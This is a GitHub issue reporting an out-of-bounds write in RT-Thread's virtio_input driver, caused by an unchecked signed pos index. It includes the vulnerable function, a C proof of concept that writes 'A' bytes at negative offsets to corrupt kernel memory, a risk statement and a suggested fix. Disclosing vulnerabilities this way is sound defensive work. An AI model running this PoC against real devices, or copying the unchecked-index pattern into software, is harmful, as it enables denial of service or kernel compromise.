rt-thread icon indicating copy to clipboard operation
rt-thread copied to clipboard
verified publisher icon RT-Thread

[Bug] Out of bounds write in virtio_input driver

Open strifescu opened this issue 6 months ago • 0 comments

RT-Thread Version

v5.2.1

Hardware Type/Architectures

Not Apply

Develop Toolchain

Other

Describe the bug

Summary

We have identified an out of bounds write vulnerability in function virtio_input_write from virtio_input driver.

Description

The vulnerability is present in file rt-thread/components/drivers/virtio/virtio_input.c. The issue arises due to insufficient verification of the pos parameter before using it as an index in virtio_input_dev->bcst_events array.

static rt_ssize_t virtio_input_write(rt_device_t dev, rt_off_t pos, const void *buffer, rt_size_t size)
{
    struct virtio_input_device *virtio_input_dev = (struct virtio_input_device *)dev;

    if (buffer == RT_NULL || pos + size >= virtio_input_dev->virtio_dev.queues[VIRTIO_INPUT_QUEUE_EVENT].num)
    {
        return 0;
    }

    rt_mutex_take(&virtio_input_dev->rw_mutex, RT_WAITING_FOREVER);

    rt_memcpy(&virtio_input_dev->bcst_events[pos], buffer, size);

    rt_mutex_release(&virtio_input_dev->rw_mutex);

    return size;
}

The pos parameter is of type rt_off_t which is a signed data type. The issue appears because there is no check to guarantee that the value of pos is positive before using it as an index in virtio_input_dev->bcst_events array. This may allow an attacker to write out of bounds on addresses preceding the virtio_input_dev->bcst_events array.

Proof of Concept

We provide a PoC which triggers the vulnerability:

#include <stdint.h>
#include <stdio.h>
#include <rtthread.h>

#define DEV_NAME "virtio-input0"
#define BUFFER_SIZE 0x7000

int main(void)
{
    static rt_device_t dev = RT_NULL;
    static rt_err_t ret = 0;
    static char *buffer = RT_NULL;

    dev = rt_device_find(DEV_NAME);
    if(RT_NULL == dev)
    {
	    printf("[-] Could not find device %s\n", DEV_NAME);
	    return 0;
    }
    printf("[+] Found device %s\n", DEV_NAME);

    ret = rt_device_open(dev, RT_DEVICE_FLAG_WRONLY);
    if(RT_EOK != ret)
    {
	    printf("[-] Error could not open %s, error: %ld\n", DEV_NAME, ret);
    	return 0;
    }
    printf("[+] Opened device %s\n", DEV_NAME);
    
    buffer = (char*)rt_malloc(BUFFER_SIZE);
    if(!buffer)
    {
        printf("[-] Failed to allocate buffer\n");
    	goto cleanup_and_exit;
    }
    rt_memset(buffer, 0x41, BUFFER_SIZE);

    printf("[+] Triggering out of bounds write\n");
    for(int i = BUFFER_SIZE; i > 0; --i){
        rt_device_write(dev, -i, buffer, i);
    }
    printf("[+] Done!\n");
cleanup_and_exit:
    if(dev){
        rt_device_close(dev);
    }
    if(buffer){
        rt_free(buffer);
    }
    return 0;
}

Risk

An attacker can leverage this vulnerability to perform denial of service attack or even gain code execution at kernel level.

Remediation

We recommend adding an additional check which assures that the value of parameter pos is a positive value.

Other additional context

No response

strifescu avatar Jun 10 '25 09:06 strifescu